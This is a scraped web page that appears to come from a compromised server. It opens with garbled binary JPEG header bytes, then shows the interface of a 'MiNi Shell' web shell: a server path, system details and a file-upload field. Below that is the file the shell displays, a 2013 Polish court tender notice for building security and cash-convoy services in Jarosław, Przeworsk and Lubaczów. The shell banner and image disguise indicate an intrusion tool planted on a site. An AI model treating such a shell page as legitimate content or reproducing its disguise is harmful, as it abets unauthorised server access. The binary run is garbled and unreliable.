JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131206/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131206/504728-N-2013.html

<p class="kh_header"><b>Jarosław: Ochrona osób i mienia, konwojowanie wartości pienieżnych</b><br>
<b>Numer ogłoszenia: 504728 - 2013; data zamieszczenia: 06.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Sąd Rejonowy w Jarosławiu , ul. Jana Pawła II 11, 37-500 Jarosław, woj. podkarpackie, tel. 0-16 6248840, faks 0-16 6248840.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.jaroslaw.sr.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Ochrona osób i mienia, konwojowanie wartości pienieżnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje wykonywanie usług:

SIEDZIBA JAROSŁAW

     Część A.  Ochrona osób i mienia w budynku Sądu i na terenie posesji,  
    ( CPV 79 71 0000-4 - usługi ochroniarskie, CPV-79711000-1 - usługi nadzoru      
     przy użyciu alarmu )
      poprzez:
1. wykonywanie czynności ochrony i dozoru mienia w budynku Sądu i całej posesji   w  formie bezpośredniej ochrony fizycznej  w obsadzie :
1 osoba w godz. urzędowania Sądu tj. 7.30-15.30 w dni robocze
oraz
1 osoba w godz. 7.00-19.00 w dni robocze
Dodatkowo w sytuacjach tego wymagających - 1 osoba w godz.7.30-15.30    w dzień roboczy - do 12 razy w roku. Dzień ustalany każdorazowo między Zamawiającym a Wykonawcą w trakcie wykonywania zamówienia z tygodniowym wyprzedzeniem.
2.  wykonywanie czynności ochrony i dozoru poprzez obsługę istniejących systemów kontrolnych i zabezpieczających:
a) obsługa bramki detekcyjnej ( wykrywacza metali) w godzinach pracy Sądu;
b) całodobowy monitoring z reakcją grupy interwencyjnej w ciągu 15 minut od rozpoczęcia alarmu;
System przeciwpożarowy jest zintegrowany z systemem zabezpieczającym. Sygnał wysyłany jest drogą radiową na zastrzeżonym paśmie.
3.   konserwację i utrzymanie sprawności systemów kontrolnych i zabezpieczających,  co najmniej raz na kwartał. Zamawiający ponosi koszt naprawy oraz wymiany urządzeń   w systemach kontrolnych i zabezpieczających po okresach gwarancji.

4.   wykonywanie czynności zgodnie z przepisami dotyczącymi ochrony osób i mienia    z  zachowaniem należytej staranności i w poszanowaniu godności osobistej osób;
5. utrzymanie stanu bezpieczeństwa oraz ochrony przed zniszczeniem, uszkodzeniem,  zepsuciem posiadanego mienia;
6.   ochronę przed włamaniem, kradzieżą, napadem, rabunkiem;
7. ochronę przed utratą zdrowia lub życia osób urzędujących  w budynku       i przebywających w nim stron;
  8. przestrzeganie instrukcji przeciwpożarowej  oraz instrukcji obsługi urządzeń  zabezpieczających i alarmowych;
9. zachowanie w tajemnicy wszystkich informacji, które mają wpływ na stan bezpieczeństwa w   czasie obowiązywania umowy oraz po jej rozwiązaniu.
10. Usługa asysty przy otwieraniu i zamykaniu budynku:
Pracownicy Wykonawcy pełniący ochronę fizyczną o godzinie 19:00 zamykają budynek Sądu przy ul. Jana Pawła II 11 w Jarosławiu i przekazują klucze         w depozyt wyznaczonemu pracownikowi Wykonawcy, który uczestniczy w zamykaniu budynku. Pracownik Wykonawcy, któremu powierzono klucze do budynku Sądu o godzinie  7:00 przekazuje klucze pracownikowi pełniącemu ochronę fizyczną i uczestniczy w otwieraniu budynku Sądu.
11. Świadczenie usług otwierania i zamykania budynku Sądu w dni wolne od pracy na wezwanie Zamawiającego:
W przypadku konieczności wykonywania obowiązków służbowych w budynku Sądu Rejonowego przez pracowników Zamawiającego, pracowników Prokuratury Rejonowej w Jarosławiu, Zamawiający zawiadamia Wykonawcę o potrzebie otwarcia budynku a następnie jego zamknięcia na wezwanie.
Przewidywana ilość w/w usług dodatkowych: 36.
O terminie usługi Zamawiający zawiadamia Wykonawcę z dwudniowym wyprzedzeniem. Nie dotyczy to dyżurów aresztowych i rozpraw prowadzonych  w trybie przyśpieszonym. W przypadku konieczności otwarcia i zamknięcia budynków w związku z wykonywanym dyżurem aresztowym lub rozprawami prowadzonymi w trybie przyspieszonym Zamawiający lub pracownik Prokuratury Rejonowej zawiadamia Wykonawcę w dniu dyżuru. Wykonawca winien stawić się na wezwanie w ciągu 15 minut.
12. Zamawiający dostarczać będzie Wykonawcy na każdy miesiąc w terminie   do 28 dnia poprzedniego miesiąca harmonogram dyżurów i nazwiska osób uprawnionych do wejścia do budynku w związku z pełnionym dyżurem. Pracownicy Wykonawcy będą otwierać i zamykać budynek Sądu w razie potrzeby, na wezwanie telefoniczne osób pełniących w danym dniu dyżur aresztowy.

Część B. Konwojowanie wartości pieniężnych dla Sądu Rejonowego                w Jarosławiu (CPV-79710000-4-usługi ochroniarskie)

1.Wykonywanie czynności konwojowania  wartości pieniężnych poprzez ochronę oraz transport /  środek transportu Wykonawcy/ pracownika wraz z gotówką na trasie  do 1 km, pomiędzy siedzibą Sądu a bankiem  - do 25 konwojów miesięcznie.
Konwoje wykonywane są w dni robocze w godzinach pracy sądu w porze ustalonej między Wykonawcą a Zamawiającym. W przypadku zmiany godziny konwoju lub zorganizowania dodatkowego konwoju Zamawiający zawiadamia Wykonawcę  z godzinnym wyprzedzeniem. Wartość jednego konwoju nie przekracza 1 j.o.

2.Zapewnienie bezpieczeństwa, ochrona przed zniszczeniem, uszkodzeniem;

3.Ochrona przed kradzieżą, napadem, rabunkiem;

4.Zachowanie w tajemnicy wszystkich informacji, które mają wpływ na stan bezpieczeństwa w   czasie obowiązywania umowy oraz po jej rozwiązaniu.

SIEDZIBA PRZEWORSK

     Część C.  Ochrona osób i mienia  w budynku Sądu Rejonowego                w Jarosławiu - Wydziałów Zamiejscowych w Przeworsku - ul. Lwowska 9 i na terenie posesji wraz z otwieraniem i zamykaniem budynków mieszczących się przy ul. Lwowskiej 9 w Przeworsku i ul. Stepkiewicza 2 w Przeworsku  CPV - 79 71 0000-4 -usługi ochroniarskie, CPV-79711000-1 - usługi nadzoru  przy użyciu alarmu.
      poprzez:
1. wykonywanie czynności ochrony i dozoru mienia w budynku Sądu Rejonowego  w Jarosławiu  z siedzibą w Przeworsku mieszczącego się przy ul. Lwowskiej 9 i całej posesji  w  formie bezpośredniej ochrony fizycznej  w obsadzie :
- 1 osoba w godz. urzędowania Sądu, tj.
Poniedziałek: 7.30 do 18.00
Wtorek-Piątek: 7.00-16.00 
 - dodatkowo w sytuacjach tego wymagających - 1 osoba w godz. 7.30-15.30  w dzień roboczy - do 12 razy w roku. Dzień ustalany każdorazowo między Zamawiającym a Wykonawcą w trakcie wykonywania zamówienia z 3 - dniowym  wyprzedzeniem.
2.  wykonywanie czynności ochrony i dozoru poprzez obsługę istniejących systemów kontrolnych i zabezpieczających:
a) obsługa bramki detekcyjnej ( wykrywacza metali) w godzinach pracy Sądu;
b) całodobowy monitoring z reakcją grupy interwencyjnej w ciągu 15 minut od rozpoczęcia alarmu;
System przeciwpożarowy jest zintegrowany z systemem zabezpieczającym. Sygnał wysyłany jest drogą radiową na zastrzeżonym paśmie.
3.   konserwację i utrzymanie sprawności systemów kontrolnych i zabezpieczających,  co najmniej raz na kwartał. Zamawiający ponosi koszt naprawy oraz wymiany urządzeń  w systemach kontrolnych i zabezpieczających po okresach gwarancji.

4.   wykonywanie czynności zgodnie z przepisami dotyczącymi ochrony osób i mienia    z    zachowaniem należytej staranności i w poszanowaniu godności osobistej osób; 
5. utrzymanie stanu bezpieczeństwa oraz ochrony przed zniszczeniem, uszkodzeniem,  zepsuciem posiadanego mienia;
6.   ochronę przed włamaniem, kradzieżą, napadem, rabunkiem , 
7.   ochronę przed utratą zdrowia lub życia osób urzędujących  w budynku     i przebywających w nim stron;
  8.   przestrzeganie instrukcji przeciwpożarowej  oraz instrukcji obsługi urządzeń  zabezpieczających i alarmowych;
9.  zachowanie w tajemnicy wszystkich informacji, które mają wpływ na stan bezpieczeństwa w   czasie obowiązywania umowy oraz po jej rozwiązaniu.
10. Usługa asysty przy otwieraniu i zamykaniu budynków: Każdego dnia roboczego 30 minut przed rozpoczęciem urzędowania Sądu pracownik Wykonawcy pełniący ochronę fizyczną  w asyście pracowników Wykonawcy, którym powierzono pełnienie asysty sprawdza zabezpieczenie plomby w portfelu depozytowym, odbiera klucze i otwiera budynki mieszczące się przy ul. Lwowskiej 9 i ul. Stepkiewicza 2 w Przeworsku.
Po zakończonym dniu roboczym osoby zajmujące się sprzątaniem, po wykonaniu swoich czynności telefonicznie powiadamiają firmę zajmującą się otwieraniem  i zamykaniem budynków celem przybycia i dokonania zamknięcia budynków. Godzina zamknięcia budynków nie może przekroczyć godz. 21.00. Firma ochroniarska plombuje klucze w portfelu depozytowym i przechowuje je do następnego dnia roboczego.

11. Świadczenie usług otwierania i zamykania budynku Sądu w dni wolne od pracy na wezwanie Zamawiającego:
W przypadku konieczności wykonywania obowiązków służbowych w budynku Sądu Rejonowego w Jarosławiu z siedzibą w Przeworsku przez pracowników Zamawiającego Zamawiający zawiadamia Wykonawcę o potrzebie otwarcia budynku, a następnie jego zamknięciu na wezwania.
Przewidywana ilość w/w usług dodatkowych: 36.
O terminie usługi zawiadamia Wykonawcę z dwudniowym wyprzedzeniem. Nie dotyczy to dyżurów aresztowych i rozpraw prowadzonych w trybie przyśpieszonym. W przypadku konieczności otwarcia i zamknięcia budynk w związku z wykonywanym dyżurem aresztowym lub rozprawami prowadzonymi w trybie przyśpieszonym Zamawiający zawiadamia Wykonawcę w dniu dyżuru. Wykonawca winien stawić się na wezwanie w ciągu 15 minut.

12. Zamawiający dostarczać będzie Wykonawcy na każdy miesiąc w terminie   do 28 dnia poprzedniego miesiąca harmonogram dyżurów i nazwiska osób uprawnionych do wejścia do budynku w związku z pełnionym dyżurem. Pracownicy Wykonawcy będą otwierać i zamykać budynek Sądu w razie potrzeby, na wezwanie telefoniczne osób pełniących w danym dniu dyżur aresztowy.

Część D. Konwojowanie wartości pieniężnych dla Sądu Rejonowego  w Jarosławiu - Wydziałów Zamiejscowych  w Przeworsku mieszczących się przy  ul. Lwowskiej 9 (CPV-79710000-4-usługi ochroniarskie)

1. Wykonywanie czynności konwojowania  wartości pieniężnych poprzez ochronę oraz transport /  środek transportu Wykonawcy/ pracownika wraz z gotówką na trasie  do 1 km, pomiędzy siedzibą Sądu, a bankiem  -  do 25 konwojów miesięcznie.
Wartość jednego konwoju nie przekracza 1 j.o.
Zamawiający nie zleca każdorazowo wykonania konwoju. Konwoje wykonywane są w dni robocze w godzinach pracy Sądu w porze ustalonej między Zamawiającym  i Wykonawcą. W przypadku konieczności zmiany pory konwoju lub zorganizowania dodatkowego konwoju  Zamawiający zawiadamia Wykonawcę z godzinnym wyprzedzeniem.

2.Zapewnienie bezpieczeństwa, ochrona przed zniszczeniem, uszkodzeniem
3.Ochrona przed kradzieżą, napadem rabunkiem.
4.Zachowanie w tajemnicy wszystkich informacji, które mają wpływ na stan bezpieczeństwa w  czasie obowiązywania umowy oraz po jej rozwiązaniu.


SIEDZIBA LUBACZÓW

     Część E.  Ochrona osób i mienia  w budynku Sądu Rejonowego  w Jarosławiu - Wydziałów Zamiejscowych w Lubaczowie - ul. Mickiewicza 24  i na terenie posesji wraz z otwieraniem i zamykaniem budynków mieszczących się przy ul. Mickiewicza 24 - CPV - 79 71 0000-4 - usługi ochroniarskie, CPV-79711000-1 - usługi nadzoru  przy użyciu alarmu.
      poprzez:
1. wykonywanie czynności ochrony i dozoru mienia w budynku Wydziałów Zamiejscowych  w Lubaczowie  mieszczącego się przy ul. Mickiewicza 24 i całej posesji  w  formie bezpośredniej ochrony fizycznej  w obsadzie :
- 1 osoba w godz. urzędowania Sądu, tj.
Poniedziałek: 7.30 do 18.00
Wtorek-Piątek: 7.00-16.00 
 - dodatkowo w sytuacjach tego wymagających - 1 osoba w godz. 7.30-15.30 w dzień roboczy - do 12 razy w roku. Dzień ustalany każdorazowo między Zamawiającym a Wykonawcą w trakcie wykonywania zamówienia z 3 - dniowym  wyprzedzeniem.

2.  wykonywanie czynności ochrony i dozoru poprzez obsługę istniejących systemów kontrolnych i zabezpieczających:
a) obsługa bramki detekcyjnej ( wykrywacza metali) w godzinach pracy Sądu;
b) całodobowy monitoring z reakcją grupy interwencyjnej w ciągu 15 minut od rozpoczęcia alarmu;
System przeciwpożarowy jest zintegrowany z systemem zabezpieczającym. Sygnał wysyłany jest drogą radiową na zastrzeżonym paśmie.
3.   konserwację i utrzymanie sprawności systemów kontrolnych i zabezpieczających,  co najmniej raz na kwartał. Zamawiający ponosi koszt naprawy oraz wymiany urządzeń  w systemach kontrolnych i zabezpieczających po okresach gwarancji.
4.   wykonywanie czynności zgodnie z przepisami dotyczącymi ochrony osób i mienia    z    zachowaniem należytej staranności i w poszanowaniu godności osobistej osób; 
5. utrzymanie stanu bezpieczeństwa oraz ochrony przed zniszczeniem, uszkodzeniem,  zepsuciem posiadanego mienia;
6.   ochronę przed włamaniem, kradzieżą, napadem, rabunkiem; 
7. ochronę przed utratą zdrowia lub życia osób urzędujących  w budynku  i przebywających w nim stron;
  8.  przestrzeganie instrukcji przeciwpożarowej  oraz instrukcji obsługi urządzeń  zabezpieczających i alarmowych;
9.  zachowanie w tajemnicy wszystkich informacji, które mają wpływ na stan bezpieczeństwa w   czasie obowiązywania umowy oraz po jej rozwiązaniu.

10. Usługa asysty przy otwieraniu i zamykaniu budynków: 
Każdego dnia roboczego 30 minut przed rozpoczęciem urzędowania Sądu pracownik Wykonawcy pełniący ochronę fizyczną  w asyście pracowników Wykonawcy, którym powierzono pełnienie asysty sprawdza zabezpieczenie plomby w portfelu depozytowym, odbiera klucze i otwiera budynki mieszczące się przy  ul. Mickiewicza 24.
Po zakończonym dniu roboczym osoby zajmujące się sprzątaniem, po wykonaniu swoich czynności telefonicznie powiadamiają firmę zajmująca się otwieraniem  i zamykaniem budynków celem przybycia i dokonania zamknięcia budynków. Godzina zamknięcia budynków nie może przekroczyć godz. 21.00. Firma ochroniarska plombuje klucze w portfelu depozytowym i przechowuje  do następnego dnia roboczego.

11. Świadczenie usług otwierania i zamykania budynku Sądu w dni wolne od pracy na wezwanie Zamawiającego:
W przypadku konieczności wykonywania obowiązków służbowych w budynku Sądu Rejonowego w Jarosławiu z siedzibą w Przeworsku przez pracowników Zamawiającego Zamawiający, pracowników Prokuratury zawiadamia Wykonawcę o potrzebie otwarcia budynku, a następnie jego zamknięciu na wezwania.
Przewidywana ilość w/w usług dodatkowych: 36.
O terminie usługi zawiadamia Wykonawcę z dwudniowym wyprzedzeniem. Nie dotyczy to dyżurów aresztowych i rozpraw prowadzonych w trybie przyśpieszonym. W przypadku konieczności otwarcia i zamknięcia budynku     w związku z wykonywanym dyżurem aresztowym lub rozprawami prowadzonymi w trybie przyśpieszonym Zamawiający zawiadamia Wykonawcę w dniu dyżuru. Wykonawca winien stawić się na wezwanie w ciągu 15 minut.
Zamawiający dostarczy Zamawiającemu harmonogram dyżurów i nazwiska osób uprawnionych do wejścia do budynku w związku z pełnionym dyżurem
Pracownicy Wykonawcy będą otwierać i zamykać budynek Sądu w razie potrzeby, na wezwanie telefoniczne osób pełniących w danym dniu dyżur.

12. Zamawiający dostarczać będzie Wykonawcy na każdy miesiąc w terminie   do 28 dnia poprzedniego miesiąca harmonogram dyżurów i nazwiska osób uprawnionych do wejścia do budynku w związku z pełnionym dyżurem. Pracownicy Wykonawcy będą otwierać i zamykać budynek Sądu w razie potrzeby, na wezwanie telefoniczne osób pełniących w danym dniu dyżur aresztowy.

Część F. Konwojowanie wartości pieniężnych dla Sądu Rejonowego               w Jarosławiu - Wydziałów Zamiejscowych w Lubaczowie mieszczących się przy ul. Mickiewicza 24 (CPV-79710000-4-usługi ochroniarskie)

1. Wykonywanie czynności konwojowania  wartości pieniężnych poprzez ochronę oraz transport /  środek transportu Wykonawcy/ pracownika wraz z gotówką na trasie  do 1 km, pomiędzy siedzibą Sądu, a bankiem  -  do 25 konwojów miesięcznie.
Wartość jednego konwoju nie przekracza 1 j.o.
Zamawiający nie zleca każdorazowo wykonania konwoju. Konwoje wykonywane są w dni robocze w godzinach pracy Sądu w porze ustalonej między Zamawiającym i Wykonawcą. W przypadku konieczności zmiany pory konwoju lub zorganizowania dodatkowego konwoju  Zamawiający zawiadamia Wykonawcę z godzinnym wyprzedzeniem.

2.Zapewnienie bezpieczeństwa, ochrona przed zniszczeniem, uszkodzeniem
3.Ochrona przed kradzieżą, napadem rabunkiem.
4.Zachowanie w tajemnicy wszystkich informacji, które mają wpływ na stan bezpieczeństwa w  czasie obowiązywania umowy oraz po jej rozwiązaniu..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiajacy przewiduje możliwośc udzielenia zamówień uzupełniających w przypadkach określonych w art. 67 ust. 1 pkt 6, stanowiących nie więcej niż 50 % wartości zamówienia podstawowego, polegajacych na powtórzeniu tego samego rodzaju zamówienia.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4, 79.71.11.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia, że Wykonawca spełnia warunki udziału w postępowaniu określone w art.22 ust.1 ustawy pzp oraz aktualnej koncesji wydanej przez Ministra Spraw Wewnętrznych i Administracji na prowadzenie działalności gospodarczej w zakresie ochrony osób i mienia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia, że Wykonawca spełnia warunki udziału w postępowaniu określone w art.22 ust.1 ustawy pzp oraz wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia w okresie ostatnich 3 lat przed upływem terminu składania ofert   a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem  i wartością usługom stanowiącym przedmiot zamówienia  z podaniem ich wartości, dat wykonania i odbiorców  oraz załączeniem dokumentu potwierdzającego, że te usługi były wykonane lub są wykonywane należycie.
Zamawiający wymaga wykazania minimum 2 zamówień, gdzie wykonanie jednego zamówienia wynosi co najmniej 50.000, 00 zł brutto ( słownie: pięćdziesiąt tysięcy złotych ) dla jednego zamawiającego w okresie 12 miesięcy od dnia podpisania umowy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia, że Wykonawca spełnia warunki udziału w postępowaniu określone w art.22 ust.1 ustawy pzp</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia, że Wykonawca spełnia warunki udziału w postępowaniu określone w art.22 ust.1 ustawy pzp oraz  wykazu osób, które będą uczestniczyć w realizowaniu zamówienia, oświadczenia Wykonawcy o przedłożeniu w dniu podpisania umowy licencji I stopnia dla pracowników ochrony i licencji II stopnia dla osoby nadzorującej pracowników ochrony oraz poświadczeń bezpieczeństwa upoważniających do dostępu do informacji niejawnych stanowiących tajemnicę służbową oznaczonych klauzulą -poufne- dla pracowników ochrony pełniących ochronę fizyczną wewnątrz budynku sądu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie opłaconej polisy lub innego dokumentu potwierdzającego fakt ubezpieczenia od odpowiedzialności cywilnej w zakresie działalności gospodarczej objętej niniejszym postępowaniem</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

